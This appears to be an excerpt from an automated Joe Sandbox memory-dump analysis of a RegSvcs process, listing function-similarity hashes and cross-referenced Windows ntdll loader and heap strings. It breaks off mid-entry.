                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                              • API String ID: 0-617086771
                                                                                                              • Opcode ID: 534154be0c48d553f66fae68609f4cf9e933dc98f236505f57d21acb3b9b2e0f
                                                                                                              • Instruction ID: 4681bb58c2f26c377d9a70c33667ef7b3dcf4282a5ba644cd7b8bb80acf91450
                                                                                                              • Opcode Fuzzy Hash: 534154be0c48d553f66fae68609f4cf9e933dc98f236505f57d21acb3b9b2e0f
                                                                                                              • Instruction Fuzzy Hash: E992DC70A442499FDB25CFA8C4457AEBBF1FF48304F5884A9E95AAF351D334A941CF50
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                              • API String ID: 0-4253913091
                                                                                                              • Opcode ID: e26830a80e191111c067ea18c2ac7319ff63817ae729d6af1f51430dd059b676
                                                                                                              • Instruction ID: 899a5227f074a1cfd4147768bb830d0cbe2a41cae65609bf3d428a3f67cea99c
                                                                                                              • Opcode Fuzzy Hash: e26830a80e191111c067ea18c2ac7319ff63817ae729d6af1f51430dd059b676
                                                                                                              • Instruction Fuzzy Hash: 34F19B30A50606DFEB25CF68C894B6EBBF5FB44304F5486A8E5469F391D730E981CB90
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $@
                                                                                                              • API String ID: 0-1077428164
                                                                                                              • Opcode ID: ec4e16244196d3136ac8bf84fc58643e5f0b2081c0839f7a7d0605e9d70ca0fb
                                                                                                              • Instruction ID: e90d2920bf5ef704da3b1441429fe58c46ca41138d25bb3f1500a1e873199468
                                                                                                              • Opcode Fuzzy Hash: ec4e16244196d3136ac8bf84fc58643e5f0b2081c0839f7a7d0605e9d70ca0fb
                                                                                                              • Instruction Fuzzy Hash: 88C25D716083459FDB25CF28C881BAFBBE5BFC8754F04892DEA898B291D734D845CB52
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: FilterFullPath$UseFilter$\??\
                                                                                                              • API String ID: 0-2779062949
                                                                                                              • Opcode ID: a517b525724dbcae17cc69e64e96a1bd83acd7aa17d2c20fd003c9ab6de2f2cd
                                                                                                              • Instruction ID: f29983a5c6bfca4f9ca0771e46d44eb12c801ce49ca42f8b09a3a0749fec1160
                                                                                                              • Opcode Fuzzy Hash: a517b525724dbcae17cc69e64e96a1bd83acd7aa17d2c20fd003c9ab6de2f2cd
                                                                                                              • Instruction Fuzzy Hash: 58A13C71D1162A9BDB359F68CC88BADB7B8FF48710F1041EAD909AB250E7359E84CF50
                                                                                                              Strings
                                                                                                              • Failed to allocated memory for shimmed module list, xrefs: 015FA10F
                                                                                                              • LdrpCheckModule, xrefs: 015FA117
                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 015FA121
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                              • API String ID: 0-161242083
                                                                                                              • Opcode ID: 466805270c8ac7d85d1e3c8fd4ef79af23f30780748b184c381c48ce8298f5eb
                                                                                                              • Instruction ID: 3ef61e475d686ddc25d2fb1cc75a3214722d401e4d71753ae64ba604f75ece1a
                                                                                                              • Opcode Fuzzy Hash: 466805270c8ac7d85d1e3c8fd4ef79af23f30780748b184c381c48ce8298f5eb
                                                                                                              • Instruction Fuzzy Hash: 4F71EC70A00206EFDB25EF68CC81ABEB7F4FB88704F15442DE906AF291E730A941CB51
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                              • API String ID: 0-1334570610
                                                                                                              • Opcode ID: d7ae889b22459333fb3a56340bf87ddc0a59b6bbecf1b70a7334c9e850e83775
                                                                                                              • Instruction ID: ec933785e8d95cd12b8ad395f13cc1eedc889c3c3bc1967b0cd5f4f7dbbf6159
                                                                                                              • Opcode Fuzzy Hash: d7ae889b22459333fb3a56340bf87ddc0a59b6bbecf1b70a7334c9e850e83775
                                                                                                              • Instruction Fuzzy Hash: 2E619D706603069FDB29DF28C940B6EBBE1FF44704F54855DE95A8F292D770E881CB91
                                                                                                              Strings
                                                                                                              • Failed to reallocate the system dirs string !, xrefs: 016082D7
                                                                                                              • LdrpInitializePerUserWindowsDirectory, xrefs: 016082DE
                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 016082E8
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                              • API String ID: 0-1783798831
                                                                                                              • Opcode ID: a6e2b09511265d4f6110b94caf52d32033857abcadfa661994f37597d0e5e3d5
                                                                                                              • Instruction ID: 533c75133a2566ef4758803167121ee7c727d54acfcc8a87609da03ede72ae15
                                                                                                              • Opcode Fuzzy Hash: a6e2b09511265d4f6110b94caf52d32033857abcadfa661994f37597d0e5e3d5
                                                                                                              • Instruction Fuzzy Hash: 2D41D071550312ABC721EFA8DC44B5F7BE8FB98B54F004A2EB949DB290E770D8108B92
                                                                                                              Strings
                                                                                                              • @, xrefs: 0164C1F1
                                                                                                              • PreferredUILanguages, xrefs: 0164C212
                                                                                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0164C1C5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                              • API String ID: 0-2968386058
                                                                                                              • Opcode ID: e12375df721db5eddfd1cf3694e8fc9088d935822dcf0506dc59c040db29e335
                                                                                                              • Instruction ID: c499b643916bef4a51ba988129c7cf8eeac2772d9f48b1dac4cae7a6f380fad4
                                                                                                              • Opcode Fuzzy Hash: e12375df721db5eddfd1cf3694e8fc9088d935822dcf0506dc59c040db29e335
                                                                                                              • Instruction Fuzzy Hash: 38416271E1120AEBDB11DED9CC51FEFBBB8BB54704F14806AE605B7340E7B49A458B50
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                              • API String ID: 0-1373925480
                                                                                                              • Opcode ID: aa202f814b564eabbddd6b0b9124eacc10859c5efe3c8ea085f5a1341b259f0b
                                                                                                              • Instruction ID: d6f5a90e7c66356d33f3074fc264097ad29073c01750ff5a6f5e2b2d8083ac41
                                                                                                              • Opcode Fuzzy Hash: aa202f814b564eabbddd6b0b9124eacc10859c5efe3c8ea085f5a1341b259f0b
                                                                                                              • Instruction Fuzzy Hash: 71410131A01A69CBEB229BE9CC44BACBBB8FF96340F244459D901EF381DB758901CF51
                                                                                                              Strings
                                                                                                              • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01614888
                                                                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 01614899
                                                                                                              • LdrpCheckRedirection, xrefs: 0161488F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                              • API String ID: 0-3154609507
                                                                                                              • Opcode ID: 2f87cb72fec8fa5d708c61dbbf0f6274d5fc7e18c8ce65d3c7eefbb2cf6af616
                                                                                                              • Instruction ID: e6c1565e1e20f6a50ebd16a337b9993ac8a317f6d54e2d2684df811a1e8e1e8f
                                                                                                              • Opcode Fuzzy Hash: 2f87cb72fec8fa5d708c61dbbf0f6274d5fc7e18c8ce65d3c7eefbb2cf6af616
                                                                                                              • Instruction Fuzzy Hash: 2641C172A046519FCB62CE6CDC40A267BE9BF49B90F0E066DED499B359DB30D801CB91
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                              • API String ID: 0-2558761708
                                                                                                              • Opcode ID: a63a6729dfc6857c4b7e1c2c7f23d6260b878a1f80deb7c44ff02a468e0c1d5e
                                                                                                              • Instruction ID: cde7c993a81f93480e6dadb452fbf354d9102a9e1a21cdae6727c3ed7337bbeb
                                                                                                              • Opcode Fuzzy Hash: a63a6729dfc6857c4b7e1c2c7f23d6260b878a1f80deb7c44ff02a468e0c1d5e
                                                                                                              • Instruction Fuzzy Hash: 1D11DC313B41069FDB29DA28C848B6EB3A8FF80A16F18856DF506CF291EB34E841C754
                                                                                                              Strings
                                                                                                              • LdrpInitializationFailure, xrefs: 016120FA
                                                                                                              • Process initialization failed with status 0x%08lx, xrefs: 016120F3
                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01612104
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                              • API String ID: 0-2986994758
                                                                                                              • Opcode ID: 3d024ac136c10fb3b156c0fa01b52034fd525324b1302916ca5e04578d2e895a
                                                                                                              • Instruction ID: 82ed088170871627eab7cf2df1020d1b3ee2f87abb402bfa4fa9cc247ef5346e
                                                                                                              • Opcode Fuzzy Hash: 3d024ac136c10fb3b156c0fa01b52034fd525324b1302916ca5e04578d2e895a
                                                                                                              • Instruction Fuzzy Hash: 2EF02234640309BBE724E64DDC53FAA3B68FB40B04F24045CFB006B785D2B0E980C684
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: #%u
                                                                                                              • API String ID: 48624451-232158463
                                                                                                              • Opcode ID: 60f6b0faa07c47b0d6657a799b9c9f341a7de3d2fe24bb2c6dd8a6ac6c02d17e
                                                                                                              • Instruction ID: caae78899ba3c019b759af512f8b2a7a2d4815e10baaa71677096e014533ce93
                                                                                                              • Opcode Fuzzy Hash: 60f6b0faa07c47b0d6657a799b9c9f341a7de3d2fe24bb2c6dd8a6ac6c02d17e
                                                                                                              • Instruction Fuzzy Hash: 4D715D71A0014ADFDB11DFA8C990BAEB7F8FF48344F144069EA05EB291E634ED41CBA0
                                                                                                              Strings
                                                                                                              • LdrResSearchResource Exit, xrefs: 0159AA25
                                                                                                              • LdrResSearchResource Enter, xrefs: 0159AA13
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                              • API String ID: 0-4066393604
                                                                                                              • Opcode ID: ed75efd26afe91f5355411e8a6912c2c24fd5a573488b9fc7d7f0ecb7e0b34c3
                                                                                                              • Instruction ID: 2cc58f759065872adc2c06ce2fbe586920ba84f9b42e685cc1e57b41e3a4897e
                                                                                                              • Opcode Fuzzy Hash: ed75efd26afe91f5355411e8a6912c2c24fd5a573488b9fc7d7f0ecb7e0b34c3
                                                                                                              • Instruction Fuzzy Hash: 90E15171A002199FEF22CE99C984BAEBBBAFF44314F14452AEA11EF251D774D940CB61
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: `$`
                                                                                                              • API String ID: 0-197956300
                                                                                                              • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                              • Instruction ID: 46bf9d5aa0e49a6f98937b1f546f2cef9a9a5bd7f0d1cade37b8c344fc50d197
                                                                                                              • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                              • Instruction Fuzzy Hash: D4C1BF312043429BEB65CFA8CC41B6BBBE6BFC4318F084A2DFA968B291D775D505CB51
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID: Legacy$UEFI
                                                                                                              • API String ID: 2994545307-634100481
                                                                                                              • Opcode ID: eb39a30dad9bdd1a1c10978b7afd3ca1c1f215f217ea18f21afdb680f603fefd
                                                                                                              • Instruction ID: 6e3a0a466c9a581836b7d34cadcb67ee424e89d88cf4a286ec762894a8f0b948
                                                                                                              • Opcode Fuzzy Hash: eb39a30dad9bdd1a1c10978b7afd3ca1c1f215f217ea18f21afdb680f603fefd
                                                                                                              • Instruction Fuzzy Hash: F7614171E046199FDB29DFA8CC40BAEBBB9FB44700F15486EE649EB291D7319901CB50
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @$MUI
                                                                                                              • API String ID: 0-17815947
                                                                                                              • Opcode ID: 4eb0bb5793919812ae047da061cd3b2ceb3e7e444212e009365c807bfa7cb036
                                                                                                              • Instruction ID: 80ee57c2bc3b5ab7a66f3caed0bea8fe952e138b7ac453cd14e9372f070a5047
                                                                                                              • Opcode Fuzzy Hash: 4eb0bb5793919812ae047da061cd3b2ceb3e7e444212e009365c807bfa7cb036
                                                                                                              • Instruction Fuzzy Hash: 12510871E0021EAEDF11DFA9CC90AEEBBB9FB84754F104529E611AB290DB749905CB60
                                                                                                              Strings
                                                                                                              • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0159063D
                                                                                                              • kLsE, xrefs: 01590540
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                              • API String ID: 0-2547482624
                                                                                                              • Opcode ID: 0b5c8fdca190b570f947a3c5990e41aeb8c6eda46b4814543564f76cf09f7fc5
                                                                                                              • Instruction ID: c045c69b439c6e2276934af09093cb9bf7bfd8ef7f5a5cfb27137e803150397e
                                                                                                              • Opcode Fuzzy Hash: 0b5c8fdca190b570f947a3c5990e41aeb8c6eda46b4814543564f76cf09f7fc5
                                                                                                              • Instruction Fuzzy Hash: AE51B0715047429BDB24DF68C5406ABBBE9BFC4304F104C3EEA9A8B281E734D545CB92
                                                                                                              Strings
                                                                                                              • RtlpResUltimateFallbackInfo Exit, xrefs: 0159A309
                                                                                                              • RtlpResUltimateFallbackInfo Enter, xrefs: 0159A2FB
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                              • API String ID: 0-2876891731
                                                                                                              • Opcode ID: 98e045a751d2da57daed018879231db87a1fdf968a984e93af757a5deafb5ff5
                                                                                                              • Instruction ID: dab72030c4982cf8e8fd713ec913080950cf7c2fe30a1335dd2b963afb0e9e70
                                                                                                              • Opcode Fuzzy Hash: 98e045a751d2da57daed018879231db87a1fdf968a984e93af757a5deafb5ff5
                                                                                                              • Instruction Fuzzy Hash: F7418C71A0464ADBDB11CF59C840B6EBBF4FF84704F1444A9EE00DF295E2B5D940CBA2
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID: Cleanup Group$Threadpool!
                                                                                                              • API String ID: 2994545307-4008356553
                                                                                                              • Opcode ID: 063f751863b1a1ee458660fcad87b801983d5d153682114944f51a315432e6d2
                                                                                                              • Instruction ID: 3ea5c3ae1ba7a6773c76e9554682b9610451a4ef26cb1637c3cc331e3a886b8b
                                                                                                              • Opcode Fuzzy Hash: 063f751863b1a1ee458660fcad87b801983d5d153682114944f51a315432e6d2
                                                                                                              • Instruction Fuzzy Hash: A001D1B2654748AFD321DF64CD45B167BE8F784B19F00893DA648CB190F374D844CB46
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: MUI
                                                                                                              • API String ID: 0-1339004836
                                                                                                              • Opcode ID: ac4f5ed3d8d09c2a5d625e9dc1e004d780641804e4e48da2e032205c201ab9a4
                                                                                                              • Instruction ID: 65ff8d832bff0c4d81e18df79926ba7042df25794d9ae8271257ea0f20f25538
                                                                                                              • Opcode Fuzzy Hash: ac4f5ed3d8d09c2a5d625e9dc1e004d780641804e4e48da2e032205c201ab9a4
                                                                                                              • Instruction Fuzzy Hash: 5F826A75E002198FEF25CFA9C980BEDBBB5BF48310F148169E919AF391D770A941CB52
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID: 0-3916222277
                                                                                                              • Opcode ID: 1581faa1144ada766ce92ca7ef059f960b794cb24c35fe367aea4d1b7510a0f8
                                                                                                              • Instruction ID: e2ddae38a2fe650344882bd47bd052e34b5f0b66d1beaca83b9e28b7337923d6
                                                                                                              • Opcode Fuzzy Hash: 1581faa1144ada766ce92ca7ef059f960b794cb24c35fe367aea4d1b7510a0f8
                                                                                                              • Instruction Fuzzy Hash: 0F916071A4121AAFEB21DF99CC85FAEBBB9FF54750F144065F600AB294D774AD00CBA0
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID: 0-3916222277
                                                                                                              • Opcode ID: 5eac0587ce231e35b948078d0d73e72a3a587bd1f21dff68a00c3df885a7228d
                                                                                                              • Instruction ID: 2730c4c7b9c06213efd93c4554560399c4cecc59d145b692d2bd5312c4f0f446
                                                                                                              • Opcode Fuzzy Hash: 5eac0587ce231e35b948078d0d73e72a3a587bd1f21dff68a00c3df885a7228d
                                                                                                              • Instruction Fuzzy Hash: 1B91803190150ABEEB22AFA5DC44FAFBB79FFC5744F100029F501AB250D7769902CBA0
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: GlobalTags
                                                                                                              • API String ID: 0-1106856819
                                                                                                              • Opcode ID: 7a33ecc541f95399652535e51796f887c7aa3be0dec58b60b6200a7fa9c335ea
                                                                                                              • Instruction ID: 68a78e46a734cb9974799164a33210d45bf26772d98b073e29884b59d85002a6
                                                                                                              • Opcode Fuzzy Hash: 7a33ecc541f95399652535e51796f887c7aa3be0dec58b60b6200a7fa9c335ea
                                                                                                              • Instruction Fuzzy Hash: 7C714175E0021A9FDF19CF9CD9906AEBBB1BF88710F14812DE505AB381E7719951CB60
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: .mui
                                                                                                              • API String ID: 0-1199573805
                                                                                                              • Opcode ID: cdb59990749f9ca95a40806ca1f91250ce37740cc5162cc548e4677b191b3c47
                                                                                                              • Instruction ID: 51e690ce4e3e2ccb8db6a00189169f56d19f7049c6adb8c69ab9ffba47b8e9f3
                                                                                                              • Opcode Fuzzy Hash: cdb59990749f9ca95a40806ca1f91250ce37740cc5162cc548e4677b191b3c47
                                                                                                              • Instruction Fuzzy Hash: 61518372D0022A9BDF14DF99DC40AAEFBB4BF84650F05416AE911BB354DB749C02CBE4
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: EXT-
                                                                                                              • API String ID: 0-1948896318
                                                                                                              • Opcode ID: 4ea8bb0f24a83e4de3047f93ec3f969f328c8750d33ee76c76173773bac3e2d6
                                                                                                              • Instruction ID: db6d926acd5ee29a2f62cf14281278c9dfe8de447f141fbac7dc718867b71fb0
                                                                                                              • Opcode Fuzzy Hash: 4ea8bb0f24a83e4de3047f93ec3f969f328c8750d33ee76c76173773bac3e2d6
                                                                                                              • Instruction Fuzzy Hash: 2F4181725483429BD710DA79C981B6FBBE8FFC8614F84092DF684DF180E674D904C7A2
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: BinaryHash
                                                                                                              • API String ID: 0-2202222882
                                                                                                              • Opcode ID: f9f71523bd7147b5f336ce14459495fcf6eb7f3c5e6486ddca83ead7b0f7274d
                                                                                                              • Instruction ID: b4779608049adb8cddab0aeb9425a605efc8c49f28f5041facceb236eae3ab10
                                                                                                              • Opcode Fuzzy Hash: f9f71523bd7147b5f336ce14459495fcf6eb7f3c5e6486ddca83ead7b0f7274d
                                                                                                              • Instruction Fuzzy Hash: F14145B1D0052DABDB21DA54CC84FDFB77DAB45714F0146E5EA08AB180DB709E898F98
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: #
                                                                                                              • API String ID: 0-1885708031
                                                                                                              • Opcode ID: 9f978518afac21f0d57b059d7afb8ee5a0993be762c72ae7c601e2aa28085425
                                                                                                              • Instruction ID: 21783af9cb31f6a3f9a746dfc93ba47b54d53cb79f1a697bc3e310a0d435d6c8
                                                                                                              • Opcode Fuzzy Hash: 9f978518afac21f0d57b059d7afb8ee5a0993be762c72ae7c601e2aa28085425
                                                                                                              • Instruction Fuzzy Hash: 9431E531B00A699AEB22EB69CC50BEE7BA8EF44704F544068ED41AF282D775D815CF50
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: BinaryName
                                                                                                              • API String ID: 0-215506332
                                                                                                              • Opcode ID: 2c9469abf03b4bcfafef18f3bb5afb03fdf4d24e4490cb0d0bff1083b643deb8
                                                                                                              • Instruction ID: 8d1591ce9ace2496ce715455c37ad7adc111679dc7319c2b03fe24f27390891e
                                                                                                              • Opcode Fuzzy Hash: 2c9469abf03b4bcfafef18f3bb5afb03fdf4d24e4490cb0d0bff1083b643deb8
